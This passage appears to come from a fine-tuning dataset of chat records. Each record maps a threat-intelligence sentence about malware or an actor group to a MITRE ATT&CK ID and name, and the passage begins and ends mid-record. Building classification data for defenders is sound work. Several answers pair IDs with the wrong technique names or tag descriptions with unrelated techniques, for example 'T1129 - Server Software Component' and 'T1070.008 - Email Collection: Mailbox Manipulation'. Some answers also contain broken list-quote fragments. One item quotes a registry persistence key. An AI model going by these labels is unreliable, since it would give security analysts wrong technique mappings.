- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DustySky captures PNG screenshots of the main screen."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lucifer is quite powerful in its capabilities. Not only is it capable of dropping XMRig for cryptojacking Monero, it’s also capable of command and control (C2) operation and self-propagation through the exploitation of multiple vulnerabilities and credential brute-forcing. Additionally, it drops and runs EternalBlue, EternalRomance, and DoublePulsar backdoor against vulnerable targets for intranet infections"
- },
- {
- "role": "assistant",
- "content": "T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For Operation Spalax, the threat actors used a variety of packers, including CyaX, to obfuscate malicious executables."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crimson contains a command to perform screen captures."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Operation Wocao has used a VBScript to conduct reconnaissance on targeted systems."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "(Source: Dell SecureWorks) To facilitate lateral movement, the adversaries deploy ASPXTool web shells to internally accessible systems running IIS"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "steals data stored in the clipboard."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "disguised its malicious binaries with several layers of obfuscation, including encrypting the files."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This data theft module appears to have been compiled in May 2015 and is designed to watch removable drives and collect files from them, depending on a set of rules defined by the attackers. The stolen data is copied into a hidden directory as “%MYPICTURES%\\%volume serial number%“, from where it can be exfiltrated by the attackers using one of the AZZY implants"
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging', 'T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When issuing a beacon to its C2, PingPull will send an Echo Request packet to the C2 server with total and current set to 0 and will include no encoded and encrypted data, as seen in Figure 1."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding', 'T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BoomBox can decrypt AES-encrypted files downloaded from C2."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROKRAT can send collected data to cloud storage services such as PCloud."
- },
- {
- "role": "assistant",
- "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "looks for net and account or domain in close proximity"
- },
- {
- "role": "assistant",
- "content": "T1201 - Password Policy Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These files are then transmitted to a threat actor, often over commonly open ports 80 and 443 (HTTP and HTTPS)"
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port', 'T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pteranodon has the ability to use anti-detection functions to identify sandbox environments."
- },
- {
- "role": "assistant",
- "content": "T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has used publicly available tools to dump password hashes, including HOMEFRY."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The MPK Trojan also monitors specifically for windows that are likely to contain login forms for popular web-based email clients, such as titles that contain: “Gmail -” “Yahoo – login” “Sign In -” “Outlook.com -“ MPK will attempt to parse these window titles to identify the associated email address and record these to the log file using the following format: ///////////// Mail Find /////////// If the Trojan does not find the window titles associated with Gmail, Yahoo or Outlook, it saves the title to the “Save.tmp” file in the following format: +++++++++++++ Window= +++++++++++++ The major difference between the IRC variant and non-IRC variant of MPK is the C2 protocol used"
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Valak can use the clientgrabber module to steal e-mail credentials from the Registry."
- },
- {
- "role": "assistant",
- "content": "T1552.002 - Unsecured Credentials: Credentials in Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Watering holes - Weaponized documents exploiting the Dynamic Data Exchange (DDE) method - Weaponized documents exploiting the CVE-2018-0798 vulnerability in Equation Editor - Exploitation of the CVE-2019-0604 vulnerability in Sharepoint - Supply chain attack that compromises a chat software installer, Able Desktop - Exploitation of recent vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in Microsoft Exchange Server"
- },
- {
- "role": "assistant",
- "content": "T1195.002 - Compromise Software Supply Chain', 'T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DustySky can shutdown the infected machine."
- },
- {
- "role": "assistant",
- "content": "T1529 - System Shutdown/Reboot"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FlawedAmmyy leverages WMI to enumerate anti-virus on the victim."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent.btz saves system information into an XML file that is then XOR-encoded."
- },
- {
- "role": "assistant",
- "content": "T1560.003 - Archive via Custom Method"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FALLCHILL can modify file or directory timestamps."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grandoreiro has used compromised websites and Google Ads to bait victims into downloading its installer."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encrypts the collected files using 3-DES."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One of the file path name combinations observed was ‘C:\\ProgramData\\Dacr\\macrse.exe’, also configured in a Crimson “Main Client” sample and used for saving the payload received from the C2 when invoking the usbwrm command"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emotet has sent Microsoft Word documents with embedded macros that will invoke scripts to download additional payloads."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound has used compromised domains to host links targeted to specific phishing victims."
- },
- {
- "role": "assistant",
- "content": "T1584.001 - Domains"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ProLock can use .jpg and .bmp files to store its payload."
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The IceApple Directory Lister module can list information about files and directories including creation time, last write time, name, and size."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Komplex C2 channel uses HTTP POST requests."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware IndiaIndia obtains and sends to its C2 server the title of the window for each running process. The KilaAlfa keylogger also reports the title of the window in the foreground."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HELLOKITTY can search for specific processes to terminate."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AADInternals can gather information about a tenant’s domains using public Microsoft APIs."
- },
- {
- "role": "assistant",
- "content": "T1590.001 - Domain Properties"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 4 x_mode command and new line delimited settings As seen in Figure 4, the settings are stored in variables seen in Table 6, which are used to authenticate to the actor-controlled Google account before uploading and downloading files from Google Drive"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RedLeaves can gather browser usernames and passwords."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 has obtained and used open-source tools such as Mimikatz."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In addition, the PowerShell implant did not contain a mechanism to persist beyond a simple scheduled task"
- },
- {
- "role": "assistant",
- "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BISCUIT malware contains a secondary fallback command and control server that is contacted after the primary command and control server."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SoreFang can use HTTP in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses rundll32.exe to load its DLL."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains a cleanup module that removes traces of itself from the victim."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The string is visible within the unpacked Karagany binary and is not itself encrypted. Once the payload has been AES-encrypted, it is prepended with the IV value and Base64-encoded for transmission. Figures 4 and 5 show an example decode and decryption based on sinkhole data obtained by CTU researchers of a Karagany beacon payload"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cyber analysts are encouraged to review the information provided in this alert to detect signs of malicious network activity.Tools and capabilities used by HIDDEN COBRA actors include DDoS botnets, keyloggers, remote access tools (RATs), and wiper malware"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery', 'T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some variants of Cherry Picker use AppInit_DLLs to achieve persistence by creating the following Registry key: \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows \"AppInit_DLLs\"=\"pserver32.dll\"\""
- },
- {
- "role": "assistant",
- "content": "T1546.010 - Event Triggered Execution: AppInit DLLs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hildegard has used the BOtB tool that can break out of containers."
- },
- {
- "role": "assistant",
- "content": "T1611 - Escape to Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNBURST masqueraded its network traffic as the Orion Improvement Program (OIP) protocol."
- },
- {
- "role": "assistant",
- "content": "T1001.003 - Protocol or Service Impersonation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This file is written to the following file path: % TEMP%\\Update.~tmp After the file is written, it is then copied to a filename of ’winhelp.cpl’ in the directory that was initially chosen"
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp', 'T1036 - Masquerading', 'T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Goopy has the ability to delete emails used for C2 once the content has been copied."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host', 'T1070.008 - Email Collection: Mailbox Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After defining several variables, some of which contain ActiveX objects for file execution and manipulation later, the script uses a function to “roll” a random number"
- },
- {
- "role": "assistant",
- "content": "T1218.001 - Signed Binary Proxy Execution: Compiled HTML File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has used \"net start\" and \"net use\" for system service discovery."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a plugin to drop and execute vulnerable Outpost Sandbox or avast! Virtualization drivers in order to gain kernel mode privileges."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The initial beacon packet for S-Type contains the operating system version and file system of the victim."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 also moved laterally to servers in the environment using RDP and configured them as malware “distribution” servers. The distribution servers were used to stage the LockerGoga ransomware, additional utilities, and deployment scripts to automate installation of the ransomware. Mandiant identified a utility script named kill.bat that was run on systems in the environment. This script contained a series of anti-forensics and other commands intended to disable antivirus and destabilize the operating system. FIN6 automated the deployment of kill.bat and the LockerGoga ransomware using batch script files. FIN6 created a number of BAT files on the malware distribution servers with the naming convention xaa.bat, xab.bat, xac.bat, etc. These BAT files contained psexec commands to connect to remote systems and deploy kill.bat along with LockerGoga. FIN6 renamed the psexec service name to “mstdc” in order to masquerade as the legitimate Windows executable “msdtc"
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 used the Steam community page as a fallback mechanism for C2."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This shellcode injects the final payload taken from the resource section into the original RegAsm.exe process"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Using valid credentials, CARBON SPIDER moves laterally through victim environments using RDP and occasionally SSH. Occasionally, CARBON SPIDER has deployed the legitimate GoToAssist or TightVNC tools to provide redundant control of hosts"
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chaes has used Installutill to download content."
- },
- {
- "role": "assistant",
- "content": "T1218.004 - Signed Binary Proxy Execution: InstallUtil"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire has modules for executing scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A module in Prikormka collects information from the victim about the current user name."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GALLIUM has used VPN services, including SoftEther VPN, to access and maintain persistence in victim environments."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Talos has discovered an unknown Remote Administration Tool that we believe has been in use for over 3 years. During this time it has managed to avoid scrutiny by the security community. The current version of the malware allows the operator to steal files, keystrokes, perform screenshots, and execute arbitrary code on the infected host. Talos has named this malware KONNI. Throughout the multiple campaigns observed over the last 3 years, the actor has used an email attachment as the initial infection vector. They then use additional social engineering to prompt the target to open a .scr file, display a decoy document to the users, and finally execute the malware on the victim's machine. The malware has evolved over time"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The installer loads a DLL using rundll32."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can retrieve and execute additional payloads from the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang has performed frequent and scheduled data collection from victim networks."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay has included a rootkit to evade defenses."
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The last type of shellcode is a Cobalt Strike stager. We have confirmed the use of several different Cobalt Strike stager shellcodes since October 2019. In addition, some of the observed Cobalt Strike stager samples included a setting in the HTTP header of their malicious communications to disguise them as common jQuery request in order to evade detection by security products."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LazyScripter has hosted open-source remote access Trojans used in its operations in GitHub."
- },
- {
- "role": "assistant",
- "content": "T1608.001 - Upload Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SynAck gathers user names from infected hosts."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has studied publicly available information about a targeted organization to tailor spearphishing efforts against specific departments and/or individuals."
- },
- {
- "role": "assistant",
- "content": "T1591 - Gather Victim Org Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In our tests, running Valak from a U.S. location on a vulnerable Windows 10 host returned a banking Trojan called IcedID as the follow-up malware. In one case, we saw both IcedID and NetSupport Manager RAT-based malware delivered as follow-up malware on a Windows 7 host from June 2020"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo had used AutoIt to load and execute the DLL payload."
- },
- {
- "role": "assistant",
- "content": "T1129 - Server Software Component"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
